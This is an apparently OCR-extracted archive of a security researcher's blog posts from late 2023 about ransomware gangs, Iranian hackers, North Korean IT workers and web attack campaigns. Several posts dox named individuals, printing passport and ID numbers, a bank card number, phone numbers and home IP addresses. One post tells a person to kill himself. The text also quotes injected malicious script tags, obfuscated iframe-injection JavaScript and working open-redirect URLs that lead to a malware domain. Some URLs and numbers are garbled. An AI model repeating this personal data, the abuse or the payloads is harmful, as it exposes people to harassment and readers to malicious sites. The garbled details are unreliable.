1.1 October


1.1.1 Upcoming "The Hacker Scene - 1983 - 2023" E-Book (2023-10-03 02:17) 
Dear blog readers,


I’m working on a new book. It’s called "The Hacker Scene - 1983 - 2023" where I aim to dazzle
you as always and as usual with all the juicy technical details that you’re supposedly used to
by now and will hopefully continue to be.


I intend to release this throughout the Christmas season online for free on my [2]Archive.org
account.


Thank you. 


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEhUEFrRzubWM8sj23Dj_4iXp1EomMyrG8QkdNaxXRztx6a0Dg0it28Q0p1E64000E1c6ZVtNAIJbPUbxKmyzYCXcNwsAjQVQdbs1VM
2. https://archive.org/details/@ddanche 
1.1.2 The Most Innovative Leader in Cyber Security To Watch in 2023 Magazine Edition
(2023-10-03 02:17)


Dear blog readers, 
Here’s the original [1]article including the PDF [2]here. 


Thank you. 
3. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEjiToXM1h6PcBcVJF1IDzN3aivdgz7gz61uA8YgyVRtHU3I-Wt-90U_zHQcpnXVsMOcJzpj2trfJ-3FbeJ3dBeTXc-P9sfVPYijv


1.1.3 My First Twitter Space on How I Tracked Down The Conti Ransomware Gang
Using Real-Time OSINT (2023-10-03 02:17)


[1] 


[Twitter Space card: Dancho Danchev (Host), "How I Tracked Down the Conti Ransomware Gang Using Real-Time OSINT?", 64 tuned in, Sep 29, 25:13, Play recording]


Dear blog readers, 


Listen [2]here. 


Enjoy. 


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEjeP60kUk0Y36JOOJoKKRd_41baw_foucCMtHvzxm1xYG77.jAYKZDKsI-O0P21RrTtSgY2FGCPKuESThOOOqvmG3vS2ddoGL2wf8
2. https://twitter.com/dancho_danchev/status/1707847083900723609 


1.1.4 Me Participating in a Comparative Air Force Research Laboratory Information
Directorate Technical Report on Botnets and Malware Detection
(2023-10-03 02:17)
Table 10: Anecdotal cases of malicious domain names detected by Notos and the
corresponding days that appeared in the public BLs. [1]: hosts-file.net, [2]:
malwareurl.com, [3]: siteadvisor.com, [4]: virustotal.com, [5]: ddanchev.blogspot.com, [6]:
malwaredomainlist.com.


Domain Name 


Izwn.in 

3b9.ru 
antivirprotect.com 
Ispeed.info 
spy-destroyer.com 
free-spybot.com 
a3Lat 
gidromash.cn 
iantivirus-pro.com 
ericwanhouse.cn 
1165651291.com 




Just came across [2]this. 


Outstanding. 


1. https://blogger.googleusercontent.com/img/b/R29vVZ2x1/AVVXsEgYCeW7cR7G8£kMcJHiBzJSTYAOxcwxKvFGxX5gE0gmBEi1aGpv3B0gYzkz_JHx1Fvv96V1XsfY3MIKzZEYd100nK8PdLWCc1DHVx
2. https://apps.dtic.mil/sti/pdfs/ADA543919.pdf


1.1.5 Who Can Assist With My Wikipedia Article Draft Submission? (2023-10-03 02:17) 


Dear blog readers, 


Who can assist with my Wikipedia Article Draft submission [1]here? Thanks. Much appreciated. 


[2] 
1. https://en.wikipedia.org/wiki/Draft:Dancho_Danche 


2. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEjdH0e09fvbd3nmgUFePwCy0s9jH7YNTHPiDAtUm5Jtbga7qN3poN_nNm56yA1P6h7yKHeOIbY95QDFbB3jXRHe2AnULVRgxa0Vk3


1.1.6 Exposing Bentley and Liam From The Conti/Trickbot Malware Gang 
(2023-10-07 02:24) 
Member of the hacker group "TRICKBOT"
(also known as the Wizard Spiders)
("Ryuk", "Maze", "Conti", "Diavol")


Account (nickname): liam 


Citizen of the Russian Federation 
Name: KORNEYEV ROMAN VIKTOROVYCH 
Date of birth: September 6, 1995 


A resident of St. Petersburg, Leningrad region of the 
Russian Federation. 

Driver's license: Ne 9906 549881 dated 16.05.2019 
Bank card: 427655005681 1014 Sberbank (RF) 


Mobile phone number: +79 117265801 

Telegram 

Username: @romakorneev (Telegram-ID: 203978435) 
Skype: romankomeev2387 


E-mail address: krvthecreator@gmail.com 
E-mail: roman95@gmail.com 
E-mail: romka95@mail.ru 


Jabber: liam@q3meco3S5auwestmt.onion 
Jabber: LiamNeeson@ jabber.ru 
Jabber: liamliam@xmpp.jp 


Home IP addresses: 
188.243.183.226 
188.243.199.19 


Social networks: 

- https://www.facebook.com/profile.php? id= 100003668932901 
https://www.youtube.com/channel/UCUH8mm WenoKpm3pCQzOPB1 w?view_as=s 
ubscriber, 

- https://www.youtube.com/wwwroman95 

- https://vk.com/id2 3893726 


An image is worth a thousand video. A video (hxxp://youtube.com/watch?v=QwXs _GvsF7M) 
is worth less. 


Sample photos include: 
[4]


[5] 


Member of the hacker group "TRICKBOT"
(also known as the Wizard Spiders)
("Ryuk", "Maze", "Conti", "Diavol")


Account (nicknames): bentley / manuel / Max17 / volhvb 


Citizen of the Russian Federation 
Name: Galochkin Maxim Sergeevich 
Date of birth: May 19, 1982 


Identification number: 1901 19506002 

Passport of a citizen of the Russian Federation:
9511766005 dated 08.06.1999 

Registration address: Russian Federation, 
Khakassia, Abakan, st. Kirov, building 80, apt. | 


Mobile phone number: +79 134448958 


Telegram: 

Name: Max The Tester 
Username: @volhvb, 
Telegram id: 32910255 


Jabber: bentley@q3mcco3 Sauwestmt.onion 
Jabber: benalien@xmpp.jp 
Jabber: volhvb@exploit.im 


Social networks: 

- https://twitter.com/volhvb 

- https://facebook .com/1505024528 
- https://vk.com/id520 1387 

- https://volhvb. livejournal.com 


Also check out the following (hxxp://youtube.com/watch?v=eqBJVa89rxE). 


Sample photos include: 
Stay tuned!


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgw60RexeNxfPQx34F72GCM_RK8ieCtxiGFrtelcTpx2UfqfDoyOxpuLLF90emqLseojH7CrbSsw-W5HuUg6Z4N1Ro2krvxZisqID
2. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEiz1HLmFFrcAxRUA1s43600eD8wWB4wBee4cXeLxUE4Ekj217kRkt1UIq9MLCowYL1Ngf1DqAUTQjP3vygk2kwoQ4L8fLVwAt39U
5. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEggSqQqS2XBGkWnOrVKurZrQk_Wt_OAgCbxRPg3aanpe0Yol
1.1.7 Yavor Kolev - Part Four (2023-10-13 19:34)
Dear,


Don’t tell me you got money to buy clothes? Is this a suit? Go grab some decent clothes first 
to begin with then go home and kill yourself. But do it loudly in the toilet but before that take 
a big "your work stuff" so that when we come to visit you we can take a photo of you in all of 
your glory the "your work stuff" part. 


Enjoy! 


1. https://blogger.googleusercontent.com/img/a/AVvXsEhWyswRa8rRnWV5p0EOLomWjCpcA6Wdctt—ho94frocxEWkvx7Pkzssee2SC1R8z0F4gnFdQoWkKZHDxBTelX2WzArCBHMLIdGyydr41iVvA99B


1.1.8 Interrupting the Program to Showcase the BG Dipshits that Kidnapped Me!
(2023-10-16 20:13) 


An image is worth a thousand words. Law Enforcement is also. These are the dipshits that 
kidnapped me. Period. 
0. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEg0aqgRJhKJslphqAR1GnYJGOrAy38NrdI0rZAek7L50GcoZagmtyvrz_8pw9d5nik8feVt45q/7tI2txXMs5z13p3_-hGNQK9k4Jdm
2.
1twJBmB7zaq75_oBwYYgopbuTQBM70stwiPxLgxYJjKQhNH2CeJKdCm
1.1.9 Exposing North Korea’s IT Worker’s Eden Programming Solutions WMD-Funding
IT Services and Solutions Franchise - An Overview (2023-10-22 20:24)
Jessus. [2]This [3]just [4]in and I think I "did it" and I might even apply for the Rewards for
Justice program second time in a row this time believe it or not on North Korea’s WMD program
in terms of tracking down North Korean IT workers that appear to have launched massive
domain farms and are actively recruiting in the field of developers and IT workers to build
mobile applications and web sites where the amount at least according to the U.S. Government
goes to fund their WMD program.


In this analysis which I did in less than two hours time I'll expose the entire domain portfolio of
North Korea’s IT workers that are busy franchising across the globe potentially funding North
Korea’s WMD program at least according to the U.S. Government and will offer in-depth peek
inside their Internet-connected infrastructure.


[5] 




This domain has been seized by the Federal Bureau of Investigation in accordance 
with a seizure warrant issued by the United States District Court for the Eastern District of 
Missouri as part of a law enforcement action against North Korean Information Technology 
(IT) Workers who used it as a software development and portfolio website to advertise and 
obtain remote IT freelancer jobs using fraudulent identities. 


For additional information on North Korea's use of remote IT workers 
and how to identify them see the following advisories: 


1) Guidance on the DPRK Information Technology Workers — Treasury.gov 


— Enter “North Korean IT Workers Advisory” into any search engine — 
2) Additional Guidance on DPRK IT Workers — PSA at IC3.gov 


>> Report suspicious IT workers to IC3.gov << 


hxxp://edenprogram.com 
eden201621@gmail.com 
eden.company123@gmail.com 
Team 

Alex Banks 

Anastasiia Belenok 

Isaac Hunter 

James Baker 

Mark Rober 

Mason Church 

Tony Stewart 


[6] 
Alex Banks
alexbgit80k 


Anastasiia Belenok 


anastas-bel 


Chris B 
chris-bgit 


Eden 
Eden2016 


Isaac Hunter 
ishunter216 


James Baker 
jbaker-git 


Mark Rober 
mark-rober21 


Mason Church 
mchurch21


Tony Stewart
tonyS2013


[7] 


[8] 


[9]


[10] 
[11]


[12] 
[13]


Michael King - Lead Developer
Nick Abbate - Lead iOS & Android Developer
Tony Stewart - Full stack Mobile Developer
Claude Roberson - Full stack web developer
Tony Freeman - ASP.NET & C# Expert
Dmitriy Anisimov - Senior mobile developer
Samuel Agrebi - Senior mobile & web developer
Ricardo Salazar - Senior UI/UX Designer
David Nash - Cryptocurrency developer
Pedro Ortega - Blockchain Expert
Stanislav Cherneha


[14] 
27 May 2022 at 7:30 pm


NETK Information Systems & Programming


Good evening, everyone!
Once again the evening has come when it is time to read about people who interest us
and whom it is a pleasure to remember. That is exactly why we are continuing
the column #Graduates of our specialty.
By the way, we know for sure that you look forward to our evening editions!
After all, these are the very people we are proud of and look forward to meeting!
Without further delay, let's read on.

So, this was not very long ago and we remember this person. Artur Klopov, class of 2019.
During his studies Artur took part in programming olympiads and competitions
and always defended the honor of the #Information_Systems specialty and of the whole
Nizhny Novgorod College of Economics and Technology.

He currently lives in Nizhny Novgorod.

He studies at the Nizhny Novgorod State University of Architecture and Civil Engineering,
majoring in "Software Engineering", by correspondence.

As during his studies, he continues to work remotely as a programmer.

He works on an outsourcing basis with several companies, such as:
- The Ready Games (https://ready.gq/);
- Ready Maker;
- Eden Programming Solutions (https://edenprogram.com/), but the company acts as
an intermediary and the projects are under NDA;
- A-Games (https://a-games.fun/), with which he has worked most recently: two games
for mobile platforms.

Programming languages he uses at work: mainly C# and Java
for writing plugins for Android, Objective-C for plugins on iOS, and Rust.
Well, let us finally exclaim: you really are a programmer, Artur!!!


hxxp://github.com/Eden-programming 
hxxp://github.com/tonyS2013 


hxxp://github.com/mchurch21 


hxxp://github.com/mark-rober21 


hxxp://github.com/jbaker-git 


hxxp://github.com/ishunter216 
hxxp://github.com/Eden2016 
hxxp://github.com/chris-bgit 


hxxp://github.com/anastas-bel 


hxxp://github.com/alexbgit80k 


hxxp://dribbble.com/eden_software


hxxp://www.guru.com/freelancers/eden-programming-solutions 


Team 
Michael King


Nick Abbate 


Tony Stewart 


Claude Roberson 


Tony Freeman 


Dmitriy Anisimov 


Samuel Agrebi 


Ricardo Salazar 


David Nash 


Pedro Ortega 


Stanislav Cherneha 


hxxp://www.linkedin.com/in/michael-moore-682a51189 


Sample photos include: 


[15] 


[16] 
[17]


[18] 


Related domains known to have been involved in the campaign include: 




Related personally identifiable email address accounts known to have been involved in the 
campaign include: 




Stay tuned! 
1.2 November


1.2.1 Where Is Anton Nikolaevich Korotchenko (Антон Николаевич Коротченко)
Also Known as Koobface Botnet Master KrotReal? - Part Two (2023-11-09 01:07)
Facebook's Continued Fight Against Koobface
by Facebook Security on Tuesday, January 17, 2012 at 9:05am


It has almost been a year since we gave you our last update on the Koobface virus. After
more than 3 years and numerous hours of working closely with industry leaders, the security
community, and law enforcement, we are pleased to announce that Facebook has been free of
infections for over 9 months.


Today, Koobface is still impacting other web properties and continues to threaten security for
Internet users across the globe. While we have been able to keep Koobface off Facebook, we
won't declare victory against the virus until its authors are brought to justice. We feel it is in the
interest of everyone online to work with law enforcement and the larger security community to
identify the gang and see the full force of law brought to bear against those who have made
millions in ill-gotten gains. To this end, we will be sharing our intelligence with the rest of the
online security community in the coming weeks in an effort to rid the Web of this virus forever.


To uphold our commitment to our users and the security of their data, Facebook takes a very
aggressive approach against security threats ranging from the most annoying social spam to
malicious viruses and malware. We have been awarded the largest damages ever under the
CAN-SPAM Act, and we work with the authorities every single day to identify and prosecute
wrongdoers. While we work diligently on removing these threats from the site, our Security
Team is only truly satisfied when we can remove these threats from the Web entirely. As part
of this continued fight against malware and cybercriminals, we wanted to give you an update
on the Koobface virus.


When Koobface first surfaced in 2008, our team worked non-stop until we were able to detect
the virus, remediate affected users, and eventually identify those parties responsible; we have
been tracking them ever since. We will be sharing this investigation material, as well as
information on how to best defend against the virus, with the larger security community. This
will better enable sites still targeted by Koobface to more adequately protect their users.


Koobface was able to generate profit through pay-per-click and traffic referral schemes. After
installing malware on a user's device, the Koobface gang was able to redirect the user's traffic
and, in some cases, trick the user into paying for fake antivirus software. Koobface was able to
perform these actions by communicating with a central “Command & Control” server, which
directed the compromised computers to do the gang's bidding. While we were able to stem the
spread of the virus using a variety of tools (including our URL blacklist and Scan-And-Repair),
the “Mothership” was left untouched.


This remained the case until last March, when Facebook Security was able to perform a
technical takedown of this “Command & Control” Mothership. And since then we have
had no new sightings of Koobface for over nine months and our teams are working hard to
keep it that way.


In addition to our work behind the scenes, we have built a number of tools that have made our
security protections some of the best on the Web and have spearheaded numerous user
education campaigns to make sure that everyone knows how to best protect themselves
online. A particular success is the Scan-And-Repair tool we built with McAfee to help our users
keep their devices malware-free. Also of note is our URL blacklist system - a core component
of the Facebook Immune system. This URL blacklist not only protects users from malicious
URLs that Facebook discovers, but also protects people from known-bad URLs from all of our
external partners.

Nothing is more important to us than ensuring the security and safety of our users and their
data. Thankfully, we aren't in this fight alone: cybersecurity is a shared responsibility for law
enforcement, industry and everyone who uses the Internet. We will continue to work with the
broad security community and industry leaders, such as McAfee and Microsoft. We will stay
firmly committed to our work with law enforcement in stopping these threats and bringing the
bad guys to justice. Cybercrime involves and impacts real people, and we praise those in the
security community for coming together to expose those who have broken the law. We are
confident that our work in identifying those responsible will put a significant dent in their ability
to harm those online and lead to a safer internet for all.


To find out more about Koobface please see the latest New York Times article or visit the
Facebook Security Page.


Jessus. Just came across this and I decided to elaborate. It’s 2012 and no one is fighting
[2]Koobface. It’s just me doing research with success at the time.


If an image is worth a thousand words then check out some of the most recent publicly accessible
photos of Anton Nikolaevich Korotchenko also known as Koobface botnet master KrotReal
including some sample maps of his latest visits across the globe including possibly the fact 
that he’s visited the United States which is quite a news taking into consideration his online 
activities counting the total number of cities that he has visited internationally up to 65. 


Sample photos include: 
Stay tuned!
1.2.2 The Conti Ransomware Gang (2023-11-14 19:37)


[1]


An image is worth a thousand words. Video and related images courtesy of the Conti Ransomware
Gang is worth more. Go through my original research [2]here and my Conti Ransomware
Gang compilation [3]here.


Sample photos: 
Stay tuned!
1.2.3 The Conti Ransomware Gang - Videos - Part Two (2023-11-16 19:53)


An image is worth a thousand words. Videos courtesy of the [1]Conti Ransomware gang are
worth [2]more. Check out the following including my Conti Ransomware Gang research compilation
[3]here.


Sample videos: 
Stay tuned!
1.2.4 Interrupting the Program to Showcase the BG Dipshits that Kidnapped Me! -
Part Two (2023-11-24 04:49)
An image is worth a thousand words.
Sample Facebook accounts:
https://www.facebook.com/profile.php?id=100005932519460 - NasBnuH Feoprues 
https://www.facebook.com/profile.php?id=100030506870037 - Bacun TayescKu 
Stay tuned! 
1.2.5 Earning4u Pay Per Install Affiliate Network (2023-11-24 12:13)


An image is worth a thousand words. 
DO NOT use public AV scanners like VirusTotal.
We scan our .exe every hour special for you. 
Result: 
1.2.6 Chimera Botnet (2023-11-24 12:14)


An image is worth a thousand words. 
1.2.7 Innovative Marketing Scareware Distributor (2023-11-24 12:14)


An image is worth a thousand words. 
1.2.13 Rogue Google AdSense Campaign (2023-11-24 12:15)
[Screenshot: Google search results page (Dutch interface) for the query "download winamp free", showing Winamp download results and a "Gesponsorde links" (sponsored links) column]
2. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEhqBb9HF9kJ2—-ujR1OMGyOvpnZ2pAN87nJQ16w8ndt7WNxfoy_n11QiR831qF5oMg9fTRmfSCsEQvkjOPNw_ZYx8TXp4QiIV-FbePv


1.2.14 SQL Injection Attack Campaign (2023-11-24 12:15) 
BEAN - Seattle Cocktail Social <script src=http://yrwap.cn/h.js ...
This site may harm your computer.
18 Sep 2006 ... <script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script
src=http://yrwap.cn/h.js> Photo #2 - (0 comments) ...
www.beanonline.org/photos.asp?id=293 - Similar pages -


BEAN - Seattle Cocktail Social <script src=http://yrwap.cn/h.js ...
This site may harm your computer.
<script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script src=http://
yrwap.cn/h.js> Photo #2 - (0 comments). <script src=http://yrwap.cn/h.js> ...
www.beanonline.org/photos.asp?id=243 - Similar pages -


Decentxposure :: Thursday/Envy Split<script src=http://yrwap.cn/h ...
Temporary Residence Records — 11/12/2008. I almost forgot to mention this at all, and that
would be a pure tragedy. Thursday is back, and dare I say better...
www.decentx.com/news.asp?id=617 - 34k - Cached - Similar pages -


Online Branding Report<script src=http://yrwap.cn/h.js></script ...
This site may harm your computer.
Creating a fabulous, unique product along with a companion, sharp-dressed Web site doesn't
guarantee success. What good are a product and a site if no one...
internetviz.e-seminars.biz/Webinar/BookInformation.asp?ID=7&source=nslr - Similar pages -


leaf<script src=http://yrwap.cn/h.js></script>Products Indianleaf ...
This site may harm your computer.
leaf products Catalogs leaf Manufacturer Buyers Manufacturers Suppliers Importers Exporters
Buyer.
my.expomarkets.com/catalog-manager/productlist.asp?sscatid=507 - Similar pages -


ST 1<script src=http://yrwap.cn/h.js></script><script src=http ...
Satellite Tv charts all over the world from Asia, Europe, Atlantic and America. Daily updated
satellite information.
www.tracksat.com/satellite.asp?satelliteid=154 - 204k - Cached - Similar pages -


1. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEgS_hvJS-J_x-RlromAx4ir3Nq8V4ayRzie45mp4Jo6qVoScxDk5aPpSIId0jh-GFmG7Z2sPExJI5h_S1jy_d-9Xa01EZ1KKs1100t


1.2.15 Managed Spam Service (2023-11-24 12:15) 


An image is worth a thousand words. 
1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEj-f3U7Fa5xKTrUs-vdGx6n3msoNmblnyfz1cl_oLw7rJX4djUgX31P7zeGCmqpXNpGVROgMX3RX1tcOKY-1wvFXG57B888hfrikzR


1.2.16 EyeWonder iFrame Injection Attack Campaign (2023-11-24 12:15) 


An image is worth a thousand words. 
<base href="http://www.eyewonder.com/" /><meta http-equiv="content-type" content="text/html; charset=utf-8"
<!-- Post Click Tracking Location: EyeWonder_HomePage EyeWonder_HomePage -->
<script type="text/javascript">
<!--
var dd = new Date();
var ord = Math.round(Math.abs(Math.sin(dd.getTime())) * 1000000000) * 10000000;
var fd_pct_src = new String("<scr"+"ipt src=\"http://adsfac.us/pct_mx.asp?L=235288&source=js&ord="+ord+"\" t
document.write(fd_pct_src);
-->
</script>
<noscript>
<iframe frameborder
</noscript>
<!-- END -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-trans
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<!-- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> -->
<TITLE>EyeWonder :: Interactive Digital Advertising, Rich Media Ads, Video Ads, Flash Ads, Online Advertisin
<meta name="keywords" content="eye wonder, eyewonder, eye-wonder, iwonder, rich, media, richmedia, rich medi
<meta name="description" content="EyeWonder is Interactive Digital Advertising's fastest-growing innovator,
<META NAME="PUBLISHER" CONTENT="EyeWonder Inc.">
<META NAME="COPYRIGHT" CONTENT="Copyright 2008 by EyeWonder Inc.">
<META NAME="REVISIT-AFTER" CONTENT="7 days">
<META NAME="author" CONTENT="EyeWonder Inc.">
<META NAME="ROBOTS" CONTENT="ALL">
<link href="index.css" rel="stylesheet" type="text/css" />
<script language="javascript">AC_FL_RunContent = 0;</script>
<script src="AC_RunActiveContent.js" language="javascript"></script>
</head>


1. https://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEgqnnq0ZAxd1j70ZiQpkY JTW5mP1il1Nu08n1G8RsgiAyruH 
SkJxkZIH8uqhUXyLKhzCEdE87F _Og1AK88Zej ytbuYrq8BMDChQZed 


1.2.17 Web Malware Exploitation Kit (2023-11-24 12:15) 


An image is worth a thousand words. 


1.2.18 SQL Injection Attack Campaign (2023-11-24 12:15)


An image is worth a thousand words. 

[Screenshot: a Chinese-language SQL injection tool. The upper pane shows a Google search for "inurl:.asp?id=" combined with an intitle: keyword; the lower pane lists the resulting .asp?id= URLs together with the test result for each.]


1.2.19 Blackhat SEO Campaign (2023-11-24 12:15) 


An image is worth a thousand words. 

[Screenshot: two spreadsheet views of a sitemap with URL, lastmod, changefreq and priority columns, listing trending-keyword pages hosted on is-the-boss.com subdomains, last modified between 6/2/2009 and 6/5/2009 with a monthly change frequency.]


1.2.20 SQL Injection Attack Campaign (2023-11-24 12:15) 


An image is worth a thousand words. 


[Screenshots: a comment reply form; an HTTP request log of a page load on CNET-related hosts that includes a request to loverzpoint.info; and the HTML source of the affected comment.]


1.2.21 Compromised CPanel Offered for Sale (2023-11-24 12:16) 


An image is worth a thousand words. 


[Screenshot: cPanel WebHost Manager, "Main >> Resellers >> Show Reseller Accounts" view, listing users, domains and packages for a total of 695 accounts.]


1.2.22 Image Spam Generating Tool (2023-11-24 12:16) 


An image is worth a thousand words. 


[Screenshot: several generated variants of the same pharmaceutical image-spam message, each rendered with a different font, layout and line wrapping.]


1.2.23 Crowdsourced Iran DDoS Attack Campaign (2023-11-24 12:16) 


An image is worth a thousand words. 

[Screenshots: grids of PAGE REBOOT auto-refresh frames, each repeatedly reloading a target site; several frames show "Server Too Busy" and "Bandwidth Limit Exceeded" errors.]


1.2.24 Dancho Danchev’s Videos (2023-11-27 20:26) 


Dear blog readers, 


Find below some [1]videos courtesy of [2]me and stay tuned for more. 


[Video thumbnails: "Dancho Danchev Speaks! The World's Most Popular and Often Cited Security Blog!", "Live Cyber Threat Map", "GhostSec Team Members".]


Stay tuned! 


1. https://youtube.com/@danchodanchev8774?si=7eCvebw3n9NHeHse
2. https://youtube.com/@ddanchev?feature=shared 


1.3 December 


1.3.1 Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details (2023-12-01 14:14) 


[Screenshot: search interface of an E-Shop for stolen credit card data, with filters for BIN, last four digits, country, bank, code, level, credit/debit, type and base, and a result table reporting "Cards found: 840".]


The following are personally identifiable email address accounts including domains known to 
belong to owners of E-Shops for stolen credit card data. 


Sample domains involved include: 
Sample email address accounts involved include: 
Stay tuned! 




1.3.2 Iran’s Afkar System Yazd Co Ransomware (2023-12-01 14:15) 


[1] 
The following are the ransomware-themed domains known to have been associated with
Iran's [2]Afkar System Yazd Co ransomware.

Sample domains known to have been involved in the campaign include:

Sample email address accounts known to have been involved in the campaign include: 
amirbitminer[.]gmail.com 

thund3rz[.]protonmail.com 


2. https://rewardsforjustice.net/rewards/ahmad-khatibi-aghda/


1.3.3. Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details - Part Two (2023-12-01 14:15) 


[1] 
The following are personally identifiable email address accounts including domains known to
belong to owners of E-Shops for stolen credit card data. 


Sample email address accounts include: 

Stay tuned! 




1.3.4 Cybercrime-Friendly Forum Communities - Part Two (2023-12-01 14:16)


[Banner image: "Cybercrime Forum Data Set 2021", full offline copies of over 117 publicly accessible cybercrime-friendly forum communities.]


The following is a compilation of currently active cybercrime-friendly forum communities. 


Cybercrime-friendly forum communities include: 




1.3.5 Rewards for Justice - Dancho Danchev (2023-12-01 14:16)


[1] 


The following are domains and personally identifiable information on a bulletproof hosting 
provider mentioned by the Conti Ransomware gang. 


hxxp://school-global.ru 
hxxp://youladance.ru 

Phone: +373 775 96666

E-mail: info@morene[.]host 

Skype: morene[.]host 

Jabber: morene@jabber[.]morene[.]host 
ICQ: 700812649 / 702647156 

Telegram: @hostmorene 

Viber: +373 775 96666 

WhatsApp: +373 775 96666 


Online chat: https://morene[.]host




1.3.6 Full Names of Ashiyane Digital Security Team Members (2023-12-01 14:16)


[1] 


The following compilation is a set of full names of Ashiyane Digital Security Team Members. 


The following are the full names of Ashiyane Digital Security Team Members: 
Keyvan Sedaghati — keivan 

Ramin Baz Ghandi — frOnk 

Erfan Zadpoor — PrinceofHacking 
Hamid Norouzi — eychenz 

Poorya Mohammadrezaei — Hijacker 
Omid Norouzi — Sha2ow 

Milad Bokharaei — ®Maste 

Vahid Maani — WAHID 2 

Kaveh Jasri — root3r 

Ali Hayati — Zend 

Milad Mazaheri — mmilad200 
Mohammad Reza — iNJECTOR 
Mohammad Mohammadi — Classic 
Nima Salehi — Q7X 

Milad Jafari — Milad-Bushehr 

Shahin Salak Tootonchi — ruiner _blackhat 
Amin Bandali — anti206 

Mohammad Hadi Nasiri — unique2world 
Mahdi Chinichi — Virangar 

Amir Hossein Tahmasebi — __amir__ 


Ashkan Hosseini — Askn 
Mohammad Tajik — taghva

Meghdad Mohammadi — M3QD4D 

Sina Ahmadi Neshat — Encoder 

Behrouz Kamalian — Behrouz _ice) 
Farshid Sargheini — Azazel 

Armin — n3me3iz 

Mahdi K. — r3d.zOnE 

Iman Honarvar — iman _taktaz 

Ali Seid Nejad — Ali Eagle 

Mohammad Reza Ali Babaei — mzhacker 
Navid Naghdi — elvator 

Mohammad Reza Dolati — HIDDEN-HUNTER 
Mehrab Akherati — AliAkh 


Amin Javid — Gladiator 




1.3.7 Cybercrime-Friendly Forum Communities (2023-12-01 14:16) 


[Banner image: "Cybercrime Forum Data Set 2021. Over 117 full offline copies (19GB) of publicly accessible cybercrime forum communities. Free to download for processing and enrichment. Approach me at dancho.danchev@hush in order to obtain a free copy!"]


The following is a recently obtained compilation of currently active cybercrime-friendly forum 
communities. 


Sample cybercrime-friendly forum communities include: 




1.3.8 Emennet Pasargad (2023-12-02 13:18) 


[1] 




The following are domains and personally identifiable email address accounts belonging to 
Iran’s Emennet Pasargad also known as Eeleyanet Gostar and Eeleyanet Gostar. 


Sample domains: 
eeleyanet.com 
eeleyanet.ir 
Sample personally identifiable email address accounts: 




1.3.9 The Conti Ransomware Gang’s OSINT Artifacts (2023-12-02 16:58) 


[1] 


The following is a set of OSINT artifacts courtesy of the Conti Ransomware gang. 



Including the following two XMPP/Jabber accounts: 
mcduckgroup@exploit.im 

uvoice@xmpp.jp 




1.3.10 The Most Innovative Cyber Security Leader to Watch in 2023 (2023-12-15 19:01)


[1] 


Dear blog readers, 
I did it. Check out the article [2]here.


Related photos: 


[Photos: the CIOLook magazine cover, "In Pursuit of Cyberjustice: Dancho Danchev, Navigating the World of Cyberthreats", and the certificate awarded by CIOLook in recognition as one of "The Most Innovative Cyber Security Leaders to Watch in 2023".]

2. https://ciolook.com/in-pursuit-of-cyberjustice-dancho-danchev-navigating-the-world-of-cyberthreats/


1.3.11 Looking for a Research Sponsorship (2023-12-15 19:02) 


Dear blog readers, 
Are you interested in sponsoring my research on my way to grab a new laptop for the holidays? 


Drop me a line at dancho.danchev@hush.com to discuss and I'll do my best to deliver the 
results that we agree upon. 




1.3.12 Offering my Laptop for Memorabilia Purposes (2023-12-15 19:02) 


[1] 
Dear blog readers,


Who wants to acquire and purchase my laptop 2015-2023 for memorabilia purposes and
possibly somehow use it, preserve it or display it somewhere?


Related photo: 


[Photo: the laptop, captioned with the author's name, blog address and email address.]


Drop me a line at dancho.danchev@hush.com 




1.3.13 Upcoming Webinar Participation (2023-12-15 19:02) 


[Webinar banner: IAE Paris and XRATOR, "The evolving threat landscape and the future of cybercrime", 12 December 2023, 18:30 (Paris). Speaker: Dancho Danchev, Threat Intelligence Pioneer, nation-state cybercrime researcher. Hosted by the Co-Director of the Risk Chair and by Ronan Mouchoux, Threat Intelligence Specialist, cofounder of XRATOR.]

Dear blog readers, 
Check out the link [2]here. 

2. https://www.linkedin.com/events/theevolvingthreatlandscapeandth7138811320363036672


1.3.14 Who’s Pushing All The "Fake Updates" Malicious Software Using Redirectors and Traffic Distribution and Redirection Systems and Tools Domains? (2023-12-28 13:03)


[Screenshot: a redirection notice on a legitimate site warning that the visitor is opening a new web page on a biggerfun.org subdomain that is not part of the site.]


I’ve recently observed an increase in high-traffic and high-profile Web sites being compromised
or, to be precise, exploited through unfixed web application flaws such as redirection
notifications. The goal is to push rogue traffic distribution and traffic management domains
that are part of a URL redirection chain, which uses both legitimate high-traffic and
high-profile Web sites and purely malicious Web sites for the purpose of dropping malicious
software on the targeted hosts.


The surprising part? The entire portfolio of these traffic redirection and traffic
management domains is parked on 193.106.175.18 - AS50465 - IQHost Ltd, where one of the
bigger domain farms is parked at hxxp://biggerfun.org.


[Screenshot: a list of domains observed in the campaign.]

Sample misconfigured high-traffic and high-profile Web sites that allow redirections potentially 
bypassing reputation filters include: 


hxxp://afmonline.org/?URL=hxxp://khTrnBOWV8.biggerfun.org/khTrnBOWV8/
hxxp://whiskyparts.co/?URL=m88Z2iiER.biggerfun.org/M88Z2iiER/
hxxp://hardemancounty.org/?URL=http%3A%2F%2F1FXddDHkYN.biggerfun.org/1FXddDHkYN/
hxxp://bukkit.org/proxy.php?link=hxxp://uToqSuwC.biggerfun.org/uToqSuwC/
